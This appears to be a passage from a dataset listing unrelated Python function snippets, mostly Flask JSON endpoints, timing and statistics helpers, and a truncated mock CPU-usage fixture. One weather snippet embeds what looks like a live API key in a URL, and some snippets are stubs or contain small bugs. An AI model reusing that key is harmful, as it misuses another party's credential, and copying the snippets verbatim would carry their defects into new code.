\"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.680468\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.181316\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.681683\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.182522\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 
27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.682731\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.183680\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.683812\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.184792\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.685027\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.185709\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.686065\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.186929\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.687190\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:54.188031\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": 
\"2021-09-14T12:37:54.688674\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.189489\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.690299\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:56.191124\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n ]", "def make_request(coins, time_frame_in_min):\n while True:\n for i in coins:\n a = r.get('https://bittrex.com/api/v1.1/public/getmarketsummary?market=btc-{}'.format(i)).text\n with open('price_data/' + str(i) + '.json', 'a') as f:\n f.write('{}\\n'.format(a))\n\n time.sleep(60 * time_frame_in_min)", "def tobs():\n # Create our session (link) from Python to the DB.\n session = Session(engine)\n\n # Calculate the date 1 year ago from the last data point in the database.\n last_measurement_data_point_tuple = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n (latest_date, ) = last_measurement_data_point_tuple\n latest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')\n latest_date = latest_date.date()\n date_year_ago = latest_date - relativedelta(years=1)\n\n # Perform a query to retrieve the data and temperature scores.\n data_from_last_year = session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= date_year_ago).all()\n\n session.close()\n\n # Convert results to a dictionary \n all_temperatures = []\n for date, temp in data_from_last_year:\n if temp != None:\n temp_dict = {}\n temp_dict[date] = temp\n all_temperatures.append(temp_dict)\n # Return JSON\n return jsonify(all_temperatures)", "def getTimes():", "def getTimes():", "def getTimes():", "def update_stats(self, responses, no_responses):\n slowest_rtt = 0.0\n slowest_ip = None\n fastest_rtt = 9999999.9\n fastest_ip = None\n rtt_total = 0.0\n\n for ip, rtt in responses.items():\n rtt_total += rtt\n if rtt > slowest_rtt:\n slowest_rtt = rtt\n slowest_ip = ip\n elif rtt < fastest_rtt:\n fastest_rtt = rtt\n fastest_ip = ip\n\n sorted_rtts = sorted(responses.values())\n l = len(sorted_rtts)\n if l == 0:\n median_rtt = 0.0\n elif l % 2 == 1:\n # Odd number: Median is the middle element\n median_rtt = sorted_rtts[int(l / 2)]\n else:\n # Even number (average between two middle elements)\n median_rtt = (sorted_rtts[int(l / 2) - 1] +\n sorted_rtts[int(l / 2)]) / 2.0\n\n now = datetime.datetime.now().isoformat()\n m = {\n \"time\" : now,\n \"num_responses\" : len(responses),\n \"num_no_responses\" : len(no_responses),\n \"slowest\" : {\n \"ip\" : 
slowest_ip,\n \"rtt\" : slowest_rtt\n },\n \"fastest\" : {\n \"ip\" : fastest_ip,\n \"rtt\" : fastest_rtt\n },\n \"average_rtt\" : rtt_total / len(responses),\n \"median_rtt\" : median_rtt\n }\n\n self.measurements.insert(0, m)\n self.measurements = self.measurements[:self.max_num_measurements]", "def range():\n\n # Time this functions.\n timer = coils.Timer()\n\n # Parse the URL parameter \"amount\".\n errors = list()\n try:\n amount = flask.request.args.get('amount')\n amount = float(amount)\n except:\n errors.append('Failed to parse \"amount\" parameter.')\n\n # Bail on any errors.\n if errors:\n return flask.jsonify(errors=errors)\n\n\n latest_tstring = db.session.query(mapping.Datum).\\\n filter(mapping.Datum.name=='latest_tstamp')[0].value\n latest_time = coils.string2time(latest_tstring)\n start_time = latest_time - dt.timedelta(seconds=amount)\n start_tstring = getNearestTime(start_time)\n \n return flask.jsonify(\n begin_time=start_tstring,\n end_time=latest_tstring,\n )", "def tip_calulator(total, people, tip):\n tip = tip / 100\n total = total / people\n tip_amount = total * tip\n new_total = total + tip_amount\n\n return tip_amount, new_total\n # pass", "def send_data():\n range = request.args.get('range', '30')\n time = arrow.utcnow().replace(minutes=-int(range))\n data = Temperature.query\\\n .filter(Temperature.timestamp > time).order_by(Temperature.timestamp.desc()).all()\n return jsonify(results=[i.serialize for i in data])", "def func1():\r\n f = urllib.request.urlopen('http://api.wunderground.com/api/94127df53e899ea4/history_20000531/q/autoip.json')\r\n tob='11:00pm'\r\n \r\n # Automatically geolocate the connecting IP\r\n ff = urllib.request.urlopen('http://freegeoip.net/json/')\r\n json_string = ff.read()\r\n ff.close()\r\n location = json.loads(json_string)\r\n \r\n city =location['city']\r\n state = location['region_name']\r\n country = location['country_name']\r\n zip = location['zip_code']\r\n \r\n print(\"Your nearest Location:\")\r\n print(\"1. country: %s ,state: %s\"%(country,state))\r\n print(\"2. city: %s ,zip-code: %s\"%(city,zip))\r\n print()\r\n json_string = f.read()\r\n parsed_json = json.loads(json_string)\r\n \r\n \r\n dailySummary=parsed_json['history']['dailysummary'][0]\r\n fog=dailySummary['fog']\r\n rain=dailySummary['rain']\r\n snow=dailySummary['snow']\r\n \r\n humidity=dailySummary['humidity']\r\n maxTemp=dailySummary['maxtempm']\r\n minTemp=dailySummary['mintempm']\r\n \r\n pressure=dailySummary['meanpressurem']\r\n \r\n print(\"my birth of year is 1991, but the data is unavailable. So, 2000AD was selected\")\r\n print(\"The weather data is available from 1997 in this location!!!\")\r\n print(\"#Weather data on 31 May 2000 at the location:\")\r\n print(\"------------------------------\")\r\n print()\r\n print(\"1. fog: %s ,rain: %s ,snow: %s\"%(fog,rain,snow))\r\n print(\"2. humidity: %s ,pressure: %s\"%(humidity,pressure))\r\n \r\n print(\"3. max-temperature: %s\\u00b0C ,min-temperature: %s\\u00b0C \"%(maxTemp,minTemp))\r\n \r\n \r\n obs= parsed_json['history']['observations'][38]\r\n \r\n \r\n fog=obs['fog']\r\n rain=obs['rain']\r\n snow=obs['snow']\r\n \r\n humidity=obs['hum']\r\n Temp=obs['tempm']\r\n \r\n \r\n pressure=obs['pressurem']\r\n \r\n print()\r\n print(\"I was born roughly at 11 pm\")\r\n print(\"#Weather data at that time on 31 May 2000 at the location:\")\r\n print(\"------------------------------\")\r\n print()\r\n print(\"1. fog: %s ,rain: %s ,snow: %s\"%(fog,rain,snow))\r\n print(\"2. 
humidity: %s ,pressure: %s\"%(humidity,pressure))\r\n \r\n print(\"3. temperature: %s\\u00b0C\"%(Temp))\r\n \r\n f.close()", "def toy_transformer(in_file, out_file):\n new_data = {}\n new_data['experiment'] = \"toy\"\n with open(in_file, \"r\") as fh:\n fancyprint(in_str=(\"Importing: \" + in_file))\n source = json.load(fh)\n fancyprint(in_str=\"Converting into toy format\")\n new_data[\"version\"] = source[\"version\"]\n new_data[\"data\"] = []\n topic_counter = 3\n for topic in tqdm(source[\"data\"]):\n topic_dict = {}\n topic_dict[\"title\"] = topic[\"title\"]\n topic_dict[\"paragraphs\"] = []\n para_counter = 3\n for para in topic[\"paragraphs\"]:\n paragraph = {}\n paragraph[\"context\"] = para[\"context\"]\n paragraph[\"qas\"] = []\n qa_counter = 3\n for qas in para['qas']:\n qas_dict = {}\n qas_dict[\"id\"] = qas[\"id\"]\n qas_dict[\"is_impossible\"] = qas[\"is_impossible\"]\n qas_dict[\"question\"] = quick_clean(raw_str=qas[\"question\"])\n qas_dict[\"answers\"] = []\n if not qas[\"is_impossible\"]:\n for answer in qas[\"answers\"]:\n answer_dict = {}\n answer_dict[\"answer_start\"] = answer[\"answer_start\"]\n answer_dict[\"text\"] = answer[\"text\"]\n qas_dict[\"answers\"].append(answer_dict)\n paragraph[\"qas\"].append(qas_dict)\n\n qa_counter -= 1\n if qa_counter == 0:\n break\n\n topic_dict[\"paragraphs\"].append(paragraph)\n para_counter -= 1\n if para_counter == 0:\n break\n\n new_data[\"data\"].append(topic_dict)\n\n topic_counter -= 1\n if topic_counter == 0:\n break\n\n save(filename=out_file, obj=new_data, message=\"saving toy data\")", "def get_exercise(username, month, year):\n\n def _format_output(_workouts):\n _workouts = [w.to_dict() for w in _workouts]\n _workouts.sort(key=lambda w: w['start_time'])\n output = []\n\n if len(_workouts) > 0:\n first_workout = _workouts[0]\n prev_exercise = first_workout['exercise']\n prev_exercise_start = first_workout['start_time']\n prev_set_end = first_workout['end_time']\n if first_workout['skeleton_data']:\n picture = encodestring(first_workout['skeleton_data'])\n else:\n picture = None\n\n exercise = {\n 'exercise': prev_exercise,\n 'reps': [first_workout['repetitions']],\n 'weights': [first_workout['weight']],\n 'startTimes': [first_workout['start_time']],\n 'endTimes': [first_workout['end_time']],\n 'picture': picture\n }\n\n for ii in range(1, len(_workouts)):\n current_workout = _workouts[ii]\n current_set_start = current_workout['start_time']\n if current_workout['exercise'] == prev_exercise and current_set_start - prev_set_end < REST_INTERVAL:\n exercise['reps'].append(current_workout['repetitions'])\n exercise['weights'].append(current_workout['weight'])\n exercise['startTimes'].append(current_set_start)\n exercise['endTimes'].append(current_workout['end_time'])\n else:\n output.append({\n 'date': prev_exercise_start,\n 'exercises': exercise\n })\n prev_exercise_start = current_workout['start_time']\n if current_workout['skeleton_data']:\n picture = encodestring(current_workout['skeleton_data'])\n else:\n picture = None\n\n exercise = {\n 'exercise': current_workout['exercise'],\n 'reps': [current_workout['repetitions']],\n 'weights': [current_workout['weight']],\n 'startTimes': [current_set_start],\n 'endTimes': [current_workout['end_time']],\n 'picture': picture\n }\n\n prev_exercise = current_workout['exercise']\n prev_set_end = current_workout['end_time']\n\n output.append({\n 'date': prev_exercise_start,\n 'exercises': exercise\n })\n\n return output\n\n if month < MIN_MONTH or month > MAX_MONTH or year < 
MIN_YEAR:\n raise ValueError('Invalid date passed into workout query')\n\n user_id = _get_user_id(username)\n if user_id is None:\n return None\n\n epoch = datetime(month=1, year=1970, day=1)\n month_start_epoch = int((datetime(month=month, year=year, day=1) - epoch).total_seconds())\n if month == 12:\n month_end_epoch = int((datetime(month=1, year=year + 1, day=1) - epoch).total_seconds())\n else:\n month_end_epoch = int((datetime(month=month + 1, year=year, day=1) - epoch).total_seconds())\n\n exercises = select(exercise for exercise in UserExerciseData\n if (exercise.user_id == user_id\n and exercise.start_time > month_start_epoch\n and exercise.start_time < month_end_epoch)\n )[:]\n\n exercises = _format_output(exercises)\n\n # Ensure that query obtained results\n if len(exercises) > 0:\n result = {'username': username, 'data': exercises}\n else:\n result = None\n return result", "def zeetemps(start_date):\n print(\"server received request for tobs stats start to end of data...\")\n # correct for dates before the start of our data\n if start_date < '2010-01-01':\n start_date = '2010-01-01'\n # set end date\n end_date = '2017-08-23'\n range_df = temps_df[(temps_df['date'] >= start_date) & (temps_df['date'] <= end_date)]\n lowest = range_df['tobs'].min()\n highest = range_df['tobs'].max()\n average = range_df['tobs'].mean()\n output = {'TMIN': lowest, 'TMAX': highest, 'TAVG': average}\n return jsonify(output)", "def temps(): \n \n # Create session and save reference to table\n session = Session(engine)\n Measurement = Base.classes.measurement\n\n # Query\n tobs_query = session.query(Measurement.date, func.avg(Measurement.tobs).label('tobs'))\\\n .filter(Measurement.date >= '2016-08-23').group_by(Measurement.date)\n \n tobs_list = []\n for row in tobs_query:\n tobs_list.append(row._asdict())\n \n return jsonify(tobs_list)\n\n session.close()", "def calc_times():\n app.logger.debug(\"Got a JSON calc_time post\");\n global dateFormat\n reply = {}\n bLength = int(request.form[\"bLength\"])\n\n try:\n start = arrow.get(flask.session[\"bStart\"], \"YYYY/MM/DD HH:mm\")\n except:\n reply[\"message\"] = \"Bad date Time.\"\n return jsonify(result=reply)\n\n brevet = AcpBrevet(bLength, start)\n open_limit = brevet.calc_open(int(request.form[\"dist\"]),bLength)\n close_limit = brevet.calc_close(int(request.form[\"dist\"]),bLength)\n\n reply[\"message\"] = \"Controle added or updated.\"\n reply[\"open\"] = open_limit.format(dateFormat)\n reply[\"close\"] = close_limit.format(dateFormat)\n\n return jsonify(result=reply)", "def write_stacked_response_times(self):\r\n results_dirname = get_param(\"results_dir\")\r\n filename = os.path.join(results_dirname, \"%s_%s\" % (get_param(\"file_prefix\"),\r\n \"stacked_fairness\"))\r\n file = open(filename, \"w\")\r\n file.write(\"time\\trunning_tasks\\n\")\r\n previous_time = -1\r\n # Write in reverse order so that we automatically get the last event\r\n # for each time.\r\n for time, running_tasks in reversed(self.new_running_tasks):\r\n if time != previous_time:\r\n if previous_time != -1:\r\n file.write(\"%d\\t\" % time)\r\n for user in range(get_param(\"num_users\")):\r\n file.write(\"%d\\t\" % running_tasks[user])\r\n file.write(\"\\n\")\r\n previous_time = time", "def slow_update_duration(self):\n for i in range(len(self.data_file.sorted_data)):\n if self.data_file.sorted_data[i]['type'] == 'slow':\n slow_upd = self.data_file.sorted_data[i]['timestamp']\n Config.ANALYSIS.write(f\"slow at: {slow_upd}\\n\")\n if i == 0:\n after_slow = 
self.data_file.sorted_data[i + 1]['timestamp']\n Config.ANALYSIS.write(f\"after slow: ({slow_upd}, {after_slow}) \"\n f\"= {after_slow - slow_upd}\\n\\n\")\n elif i == len(self.data_file.sorted_data) - 1:\n before_slow = self.data_file.sorted_data[i - 1]['timestamp']\n Config.ANALYSIS.write(f\"before slow: ({before_slow}, {slow_upd}) \"\n f\"= {slow_upd - before_slow}\\n\\n\")\n else:\n before_slow = self.data_file.sorted_data[i - 1]['timestamp']\n after_slow = self.data_file.sorted_data[i + 1]['timestamp']\n Config.ANALYSIS.write(f\"before slow: ({before_slow}, {slow_upd}) \"\n f\"= {slow_upd - before_slow}\\n\")\n Config.ANALYSIS.write(f\"after slow: ({slow_upd}, {after_slow}) \"\n f\"= {after_slow - slow_upd}\\n\\n\")\n Config.ANALYSIS.write(\"\\n\\n\")", "def _calc_times():\n app.logger.debug(\"Got a JSON request\")\n distance = request.args.get(\"distance\", type = int)\n begin_time = request.args.get(\"begin_time\", type = str)\n begin_date = request.args.get(\"begin_date\", type = str)\n brevet_start_time = begin_date + \" \" + begin_time\n km = request.args.get('km', 999, type=float)\n\n app.logger.debug(\"km={}\".format(km))\n app.logger.debug(\"request.args: {}\".format(request.args))\n # FIXME: These probably aren't the right open and close times\n # and brevets may be longer than 200km\n open_time = acp_times.open_time(km, distance, brevet_start_time)\n close_time = acp_times.close_time(km, distance, brevet_start_time)\n result = {\"open\": open_time, \"close\": close_time}\n return flask.jsonify(result=result)", "def temp():\n \n #Query temp from a year from last data point\n query = session.query(func.max(Measurement.date)).first()\n maxDate = dt.datetime.strptime(query[0],'%Y-%m-%d')\n year_ago = maxDate - dt.timedelta(days=365)\n\n results = session.query(Measurement.date,Measurement.tobs).filter(Measurement.date>=year_ago).all()\n\n # convert list of tuples into normal list\n all_dates = (result[0] for result in results)\n all_tobs = (result[1] for result in results)\n\n # Convert result to dictionary using date as key and tobs as value\n tobs_dict = dict(zip(all_dates,all_tobs))\n\n # Return on webpage\n return jsonify(tobs_dict)", "def output_stats(self):\n elapsed = self.timer.elapsed.total_seconds()\n count = self.copied + self.errored\n total = self.total\n # Time per key in milliseconds\n avg = round(elapsed / count * 1000, 3)\n # Time remaining in seconds\n remaining = 1.0 * elapsed / count * (total - count)\n # Time remaining in minutes\n remaining = round(remaining / 60.0, 1)\n # Time taken in minutes\n elapsed = round(elapsed / 60.0, 1)\n\n self.log.info(f\"{self.prefix}: {avg}ms avg, {elapsed}min passed, \"\n f\"{remaining}min remaining. 
({count:,}/{total:,})\")", "def overall(update: Update, context: CallbackContext) -> None:\n\n today, _ = get_latest_stats_from_db()\n seven_day, rolling_avg = return_weekly_figure()\n \n logger.info(\"Getting overall stats for \" + str(update.message.chat_id))\n \n text = \\\n (\n \"📊*Overall stats as of \" + today['date'] + \"*\\n\\n\"\n + \"\\t\\t\\t🔢 Overall Total - \" + str('{:,}'.format(today['totalVaccinations']))\n + \"\\n\\n\\t\\t\\t🅿️ Pfizer : \" + str('{:,}'.format(today['pfizer']))\n + \"\\n\\t\\t\\t🅰️ AstraZeneca : \" + str('{:,}'.format(today['astraZeneca']))\n + \"\\n\\t\\t\\tⓂ️ Moderna : \" + str('{:,}'.format(today['moderna']))\n + \"\\n\\t\\t\\t🇯 J&J - \" + str('{:,}'.format(today['jj'])) + \"\\n\\n\"\n + \"*🧑 Total population vaccinated*\\n\\n\"\n + \"\\t\\t\\t🌓 First dose (of a two dose vaccine) - \" + str('{0:.2%}'.format(today['firstDose']/4977400)) + \"\\n\"\n + \"\\t\\t\\t🌓 Single dose vaccine - \" + str('{0:.2%}'.format(today['jj']/4977400)) + \"\\n\"\n + \"\\t\\t\\t🌝 Fully vaccinated - \" + str('{0:.2%}'.format(today['secondDose']/4977400)) + \"\\n\"\n +\"\\n\\n*🧑 12+ population vaccinated*\\n\"\n +\"\\n\\t\\t\\t🌓 First dose (of a two dose vaccine) - \" + str('{0:.2%}'.format(today['firstDose']/4183700))\n +\"\\n\\t\\t\\t🌓 Single dose vaccine - \" + str('{0:.2%}'.format(today['jj']/4183700))\n +\"\\n\\t\\t\\t🌝 Fully vaccinated - \" + str('{0:.2%}'.format(today['secondDose']/4183700)) + \"\\n\"\n + \"\\n📅 *Rolling 7 Day Stats*\\n\" \n + \"\\n\\t\\t\\t📈 Rolling 7 Day Doses - \" + str('{:,}'.format(seven_day))\n + \"\\n\\t\\t\\t💉 Average Daily Doses - \" + str('{:,}'.format(rolling_avg))\n + \"\\n\\n👇* Commands *\"\n + \"\\n\\n\\t\\t\\t/daily - Subscribe for daily updates\"\n + \"\\n\\n\\t\\t\\t/unsubscribe - Unsubscribe from updates\"\n + \"\\n\\n\\t\\t\\t/start - See all commands\"\n )\n\n update.message.reply_markdown(text)", "def tobs():\n \n #get max and year_past date from DB\n max_dt, yr_past = get_year_past()\n \n session = Session(engine)\n # Query all Measurement Table to get precipitation date for all available dates\n results = session.query(M.date.label('Date'), coalesce(M.tobs.label(\"TempObs\"),0)).\\\n filter(M.date >= yr_past).order_by(M.date).all()\n \n # Convert list of tuples into dict with date as the key and precipitation as value\n temp_dict = [{d:p} for d,p in results]\n \n session.close()\n return jsonify(temp_dict)", "def print_json(results, number, concurrency):\n import json\n stats = calc_stats(results, number, concurrency)\n print(json.dumps(stats))", "def json_frapp(request):\n from pv.settings import MEDIA_URL\n\n if request.GET.get('date') == None:\n start = datetime.combine(date.today(), time(0, 0))\n else:\n start = datetime.combine( datetime.strptime(request.GET.get('date'), '%Y-%m-%d').date(), time(0, 0))\n\n end = datetime.combine(start, time(23, 59))\n\n timeslots = TimeSlot.objects.filter(start__gte=start,start__lte=end).select_related('show').order_by('start')\n\n\n '''Generate categories object for output'''\n\n categories = Category.objects.all()\n categories_output = []\n\n for c in categories:\n c_entry = {\n 'id': c.id,\n 'color': c.color.replace('#', '').upper(),\n 'namedisplay': c.category,\n 'description': c.description\n }\n\n categories_output.append(c_entry)\n\n # Get all series for timeslots\n series = set()\n for ts in timeslots:\n series.add(ts.show)\n\n\n '''Generate series object for output'''\n\n series_output = []\n\n for s in series:\n metainfos = []\n metainfos.append({ 'key': 'ProduzentIn', 'value': ', 
'.join(ts.show.hosts.values_list('name', flat=True)) })\n metainfos.append({ 'key': 'E-Mail', 'value': ', '.join(ts.show.hosts.values_list('email', flat=True)) })\n\n image = '' if s.image.name is None or s.image.name == '' else str(get_current_site(request)) + MEDIA_URL + s.image.name\n url = '' if s.website is None or s.website == '' else s.website\n\n # Get active schedules for the given date\n # But include upcoming single timeslots (with rrule_id=1)\n schedules = Schedule.objects.filter( Q(show=s.id,is_repetition=False) &\n (\n Q(rrule_id__gt=1,dstart__lte=start,until__gte=start) |\n Q(rrule_id=1,dstart__gte=start)\n )\n )\n\n schedules_repetition = Schedule.objects.filter( Q(show=s.id,is_repetition=True) &\n (\n Q(rrule_id__gt=1,dstart__lte=start,until__gte=start) |\n Q(rrule_id=1,dstart__gte=start)\n )\n )\n\n broadcastinfos = ''\n\n if not schedules.exists():\n continue\n\n for schedule in schedules:\n broadcastinfos = broadcastinfos + generate_frapp_broadcastinfos(schedule)\n\n if schedules_repetition.exists():\n broadcastinfos = broadcastinfos + 'Wiederholung jeweils:'\n for schedule in schedules_repetition:\n broadcastinfos = broadcastinfos + generate_frapp_broadcastinfos(schedule)\n\n s_entry = {\n 'id': s.id,\n 'categoryid': s.category.values_list('id', flat=True)[0],\n 'color': s.category.values_list('color', flat=True)[0].replace('#', '').upper(),\n 'namedisplay': s.name,\n 'description': s.description,\n 'url': url,\n 'image': image,\n 'broadcastinfos': broadcastinfos,\n 'metainfos': metainfos\n }\n\n series_output.append(s_entry)\n\n\n '''Generate shows object for output'''\n\n shows_output = []\n\n for ts in timeslots:\n\n is_repetition = ' ' + _('REP') if ts.schedule.is_repetition == 1 else ''\n namedisplay = ts.show.name + is_repetition\n description = ts.show.description\n url = str(get_current_site(request)) + '/shows/' + ts.show.slug\n urlmp3 = ''\n\n # If there's a note to the timeslot use its title, description and url\n try:\n note = Note.objects.get(timeslot=ts.id)\n namedisplay = note.title + is_repetition\n description = note.content\n url = str(get_current_site(request)) + '/notes/' + note.slug\n urlmp3 = note.audio_url\n except ObjectDoesNotExist:\n pass\n\n ts_entry = {\n 'id': ts.id,\n 'seriesid': ts.show.id,\n 'datetimestart': ts.start.strftime('%d.%m.%Y %H:%M:%S'),\n 'datetimeend': ts.end.strftime('%d.%m.%Y %H:%M:%S'),\n 'namedisplay': namedisplay,\n 'description': description,\n 'url': url,\n 'urlmp3': urlmp3,\n }\n\n shows_output.append(ts_entry)\n\n output = {}\n output['categories'] = categories_output\n output['series'] = series_output\n output['shows'] = shows_output\n\n return HttpResponse(json.dumps(output, ensure_ascii=False).encode('utf8'),\n content_type=\"application/json; charset=utf-8\")
def all_heart_data(start_date: str = None, days_limit: int = None):\n temp_json_target = 
